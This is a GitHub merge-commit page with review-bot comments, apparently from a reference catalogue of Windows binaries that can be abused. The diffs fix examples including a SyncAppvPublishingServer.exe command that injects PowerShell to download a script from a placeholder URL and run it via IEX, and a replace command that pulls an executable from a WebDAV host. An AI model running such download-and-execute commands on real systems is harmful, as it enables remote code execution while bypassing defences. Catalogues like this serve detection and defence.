Merge pull request #20 from jenic/master

Some minor modifications
master
Oddvar Moe 2018-05-21 17:33:09 +02:00 committed by GitHub
commit 1e9ae3aa9b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 5 additions and 4 deletions


@ -40,6 +40,7 @@ c:\windows\sysWOW64\bitsadmin.exe
```
Notes:
* Requires active user (doesn't work from a web shell)
Detection:
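
Review bot: In the Notes block, "Requires active user" does not say what counts as an active user. If the constraint is that the command only works inside an interactive logon session, state that directly, for example "* Requires an interactively logged-on user (doesn't work from a web shell)", so the reader does not have to infer it from the parenthetical.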


@ -3,9 +3,9 @@
* Functions: Copy, Download
```
replace c:\source\file.cab c:\destination /A
replace c:\source\file.cab c:\destination /A
replace \\http://webdav.host.com \foo\bar.exe c:\outdir /A
replace \\webdav.host.com\foo\bar.exe c:\outdir /A
```
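
Review bot: The first example, `replace c:\source\file.cab c:\destination /A`, appears twice with no visible difference, so that half of the change looks whitespace-only; drop it from the commit or mention it in the message so the diff shows only the UNC path fix. On the second example, `\\webdav.host.com\foo\bar.exe` is the right correction of the `\\http://webdav.host.com \foo\bar.exe` form. Since the header line reads "Functions: Copy, Download", a short label on each example saying which function it illustrates would help.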


@ -3,7 +3,7 @@
* Functions: Execute
```
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
```
Acknowledgements:
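
Review bot: The corrected command now has balanced parentheses and a closing quote, but the leading `n;` inside the quoted argument is still unexplained. A one-line description above the code block saying why the argument starts with `n;` would tie the example to the "Command injection into PowerShell" note later in the same file.
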
@ -23,6 +23,6 @@ C:\Windows\System32\SyncAppvPublishingServer.exe
Notes:
Command injection into PowerShell
Might have been fixed in newest version of Windows 10.
(Works as of 10.0.16299.371)
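
Review bot: "Might have been fixed in newest version of Windows 10." will go stale, because "newest" has no build or date attached, and it reads as contradicting "(Works as of 10.0.16299.371)" on the next line. Suggest a single line that carries the tested build and the uncertainty together, for example "Works as of 10.0.16299.371; may be fixed in later Windows 10 builds."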